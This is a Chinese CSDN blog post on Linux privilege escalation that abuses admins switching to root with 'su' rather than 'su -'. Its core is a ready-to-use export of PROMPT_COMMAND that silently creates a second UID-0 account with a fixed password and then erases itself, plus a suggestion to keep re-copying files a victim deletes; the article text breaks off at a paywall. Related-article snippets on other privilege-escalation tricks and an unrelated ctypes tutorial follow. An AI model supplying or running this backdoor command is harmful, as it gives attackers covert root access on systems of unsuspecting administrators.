python提权_利用python特性或bash提权

最新推荐文章于 2024-07-09 11:24:46 发布
最新推荐文章于 2024-07-09 11:24:46 发布
阅读量1.1k 收藏
点赞数
文章标签: python提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39702649/article/details/111547199
版权
本文详细介绍了如何利用Python和BASH环境变量提权的技巧,特别是针对使用`su`而非`su -`的场景。通过设置$PROMPT_COMMAND或修改PYTHONPATH环境变量,可以在用户切换到root时执行特定命令,例如添加用户。提醒读者此方法依赖于管理员的使用习惯,并提供了一些建议以提高成功率。
摘要由CSDN通过智能技术生成

ps:下面讲的特权技巧只要利用的是用户在切换到root用户时,使用的是su命令,而没有使用su – 命令。如果用户切换到root用户时使用su -命令,或者该用户从不切换到root用户,那么下面讲的提权技巧是无用的。

su 与 su – 命令的区别:

su 是切换到其他用户,但是不切换环境变量(比如说那些你用export命令查看一下,就知道两个命令的区别了)。su – 是完整的切换到一个用户环境,环境变量是新用户的环境变量。

正是利用su 切换到root用户时不切换环境变量,可以修改当前普通用户的环境变量,当用户转到root时,命令就会以root权限运行来添加用户。

要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root

看个BASH的环境变量$PROMPT_COMMAND

这个变量保存了在主提示符$显示之前需要执行的命令.

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

看图:

随后你用su变成root,看看是否多了个用户呢

也可以建立用户删除不了的文件

比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了

不管是偷也好&

最低0.47元/天 解锁文章
weixin_39702649
关注
tits_it_python_bash_
09-30
Tits is a simple CLI application which shows pictures like tits 8). The application is under Beerware license
Python 实现Windows系统提权
CSDN
05-28 5715
WMI(Windows Management Instrumentation)是Windows操作系统中的管理框架,它提供了一种标准化的方式来管理和监控计算机系统的各种资源和服务。WMI可以通过编程接口(如COM接口)进行访问,并允许开发人员和系统管理员对计算机系统进行远程管理和监控。
Python解决权限不足问题,权限提升
光明
04-04 2952
最近我在开发一个面向大众的软件,其中需要对系统中的C盘%programdata%中的一个文件进行修改。然而,当我双击打开软件进行文件修改时,却发现提示权限不足,无法完成操作。这让我感到很困扰,因为操作应该尽量的自动,不能让用户手动修改文件权限。在探索过程中,我发现可以使用ctypes库中的shell32模块来判断当前用户是否为管理员,如果不是,则可以使用ShellExecuteW函数来提升权限。总之,使用这些代码,最终成功解决了权限不足的问题,而且还可以让操作尽量的自动。
标题:内网提权探索与Python辅助工具应用
最新发布
theoxiong的博客
07-09 840
内网提权,简单来说,就是在已经成功进入目标内网后,利用系统漏洞、配置不当或权限管理上的疏忽,将当前用户权限提升至更高级别(如从普通用户提升至管理员)。在网络安全领域,内网提权是一个重要的议题,它涉及在已经渗透进企业内网后,进一步提升权限以获取更高级别的访问控制或敏感数据。作为一门强大的编程语言,虽然不直接用于执行提权攻击,但其在信息收集、自动化脚本编写等方面发挥着重要作用,为内网提权过程提供了有力支持。)来收集内网信息,如主机发现、服务扫描、端口扫描等,为提权前的情报收集提供支持。
用户管理 终端命令
红叶的博客
11-19 428
用户管理 终端命令1) 创建用户 / 设置密码 / 删除用户2) 查看用户信息3) `su` 切换用户4) **sudo**(4.1) 给 指定用户 授予 权限(4.2) 使用 用户 `xxx` 登录, 操作管理员命令(5).修改用户权限5.1 方式一: 修改用户权限目标演练:5.2 方式二目标演练:5.3 方式三: 简化方式二目标演练:系统信息相关命令目标 1) 创建用户 / 设置密码 / 删除用户 命令 作用 说明 useradd -m -g 组 新建用户名 添加新用户 -m 自动建立用
sudo命令中python提权
qq_40898302的博客
05-10 4290
python提权
MSF渗透测试之msfvenom提权python
lza20001103的博客
04-05 3477
MSF渗透测试之msfvenom提权python
Python库 | bzr_bash_completion-1.0.2-py2.5.egg
02-21
Python库“bzr_bash_completion-1.0.2-py2.5.egg”是一个专为Bazaar(bzr)版本控制系统定制的bash自动补全脚本。Bazaar是分布式版本控制系统,类似于Git,用于跟踪文件和项目的变化。这个库的目的是提高Bazaar...
pythonbash统计CPU利用率的方法
09-21
### PythonBash统计CPU利用率的方法 在计算机系统管理与监控领域,了解系统的CPU利用率是一项基本而重要的任务。本文将详细介绍如何使用PythonBash脚本来实现这一目标,并且会探讨其中涉及到的关键技术和方法。...
Archive_python3_python_zip_
09-30
1. **bash_profile** - 这通常是Unix/Linux系统中的个人配置文件,用于设置命令行环境变量和别名。在Python项目中,它可能用于设置项目特定的环境变量或路径。 2. **python_instructions** - 这可能是关于如何运行...
python脚本实现Redis未授权批量提权
09-09
主要给大家介绍了关于利用python脚本实现redis未授权批量提权的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
HackTheBox UpDown python沙箱逃逸获得用户shell,sudo提权
Ba1_Ma0的博客
11-10 2180
但是服务器禁用了一些函数,我们不能使用system()、passthru()、shell_exec()、popen()、fsockopen() 等,简单的 PHP 反向 shell用不了,但是proc_open()没有被禁用,我们可以利用这个函数来获取用户shell。根据我们刚刚的分析,我们可以创建一个.phar文件,里面放上很多网站的网址,在文件末尾放上php代码,当checker.php忙于检查站点时,我们访问上传的文件执行代码。这个网站对我们上传的文件扩展名进行了检查,不允许任何.php文件。
python提权_渗透利器 | 提权辅助工具箱
weixin_34002071的博客
01-29 1239
作为技术宅的我,日常最大的爱好就是逛论坛。某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE。嗯嗯,我想还是叫提权辅助工具可能会更顺口一些。在我印象中,类似的工具其实还蛮多的,比如我们熟知的Linux_Exploit_Suggester和Windows-Exploit-Suggester。我花了一点时间,整理了 9 款提权辅助工具,不敢独享,特整理成文。如果你对提权有那么...
linux系统文件权限管理之 ‘ACL‘
灬紫荆灬
11-26 473
一 ACL 权限简介 Linux 下用户对文件的操作权限有 r-读, w-写, x-可执行三种,而对linux 下的文件而言,用户身份分为:所有者, 所属组, 其它人, 且文件的所有者,所属组都只能是一个,所以在对文件分配用户的使用权限时,只能对这三种身份进行分配rwx 权限.Linux 主要作为服务器系统使用,用户众多.所以在实际使用场景中,这三种身份并不能很好地实现资源权限分配问题,所以就有了...
Linux提权之suid篇
weixin_43995499的博客
03-01 1986
Linux提权之suid篇 不知攻,焉知防 一个在安服路上摸索的大三生,记录平时学习笔记 suid前言: 1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义. 2.命令执行者要对该程序文件拥有执行(x)权限. 3.命令执行者在执行该程序时获得该程序文件属主的身份. 4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效 实验环境: kali 靶机账号 :muhammad 密码 : nasef START: 靶机自带提权文件suid
【linux】linux终端命令总结
weixin_43990455的博客
03-16 6114
linux终端命令总结,有些命令是桌面版linux的,是刚开始学习linux时做的一些笔记。
利用python特性进行提权
cnbird's blog
02-22 2363
http://huaidan.org/archives/2810.html
python pip提权
weixin_39219503的博客
12-21 1436
在有些linux机器中,某个用户拥有pip的sudo权限,在这种情况下,可以利用pip install进行本地提权。 在执行pip install时会调用setup.py,可以在本地创建恶意setup.py文件来达到任意命令执行的效果。 from setuptools import setup from setuptools.command.install import install impor...
python ctypes教程_Python利用ctypes提高执行速度
05-26
Python是一种解释型语言,通常情况下执行速度比编译型语言要慢。然而,Python提供了许多工具和库来提高其执行速度。其中一个重要的工具是ctypes(C types)库,它允许Python与C语言进行交互,从而能够利用C语言的执行速度。 在本教程中,我们将介绍如何使用ctypes来提高Python的执行速度。 ## 安装ctypes 通常情况下,ctypes已经包含在Python标准库中,因此你不需要安装它。如果你使用的是较早版本的Python,则需要单独安装ctypes库。 ## 使用ctypes 要使用ctypes,我们需要了解以下几个关键概念: - 数据类型 - 指针 - 动态链接库 ### 数据类型 C语言有许多不同的数据类型,如整数、浮点数、字符等。Python也有其自己的数据类型。为了在Python中使用C语言的数据类型,我们需要使用ctypes库中的数据类型。 以下是一些常用的ctypes数据类型: | C 数据类型 | ctypes 数据类型 | | --- | --- | | char | c_char | | int | c_int | | long | c_long | | unsigned int | c_uint | | unsigned long | c_ulong | | float | c_float | | double | c_double | ### 指针 C语言中有指针的概念,指针是一个变量,其值为另一个变量的地址。在Python中,我们可以使用ctypes中的指针类型来模拟C语言中的指针。 以下是一些常用的ctypes指针类型: | C 指针类型 | ctypes 指针类型 | | --- | --- | | int* | POINTER(c_int) | | float* | POINTER(c_float) | | char* | POINTER(c_char) | ### 动态链接库 动态链接库是一种可重定位的文件,其中包含函数和变量的代码和数据。当我们使用ctypes时,我们通常会加载一个动态链接库,并从中调用函数。 以下是一些常用的ctypes库函数: - `cdll.LoadLibrary()`:加载一个动态链接库。 - `dll.function()`:调用库中的函数。 ## 示例 下面是一个示例,演示如何使用ctypes在Python中调用C语言编写的函数。假设我们有一个C语言函数,其定义如下: ```c int add(int a, int b) { return a + b; } ``` 我们可以将此函数编译为动态链接库,然后在Python中使用ctypes调用它。 首先,我们需要编写一个Python脚本,用于加载并调用动态链接库中的函数: ```python import ctypes # 加载动态链接库 lib = ctypes.cdll.LoadLibrary('./libadd.so') # 获取函数 add = lib.add # 设置参数和返回值类型 add.argtypes = (ctypes.c_int, ctypes.c_int) add.restype = ctypes.c_int # 调用函数 print(add(1, 2)) ``` 然后,我们可以使用以下命令将C语言代码编译为动态链接库: ```bash gcc -shared -o libadd.so add.c ``` 其中,add.c是包含上面C语言代码的文件名。 最后,我们可以运行Python脚本,并从控制台输出结果: ```bash $ python3 test.py 3 ``` 这里我们成功地使用ctypes在Python中调用了C语言函数。 ## 总结 在本教程中,我们介绍了如何使用ctypes库在Python中调用C语言函数。我们了解了ctypes中的数据类型、指针和动态链接库,并提供了一个示例来演示如何使用它们。使用ctypes可以大大提高Python的执行速度,特别是在处理大量数据时。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值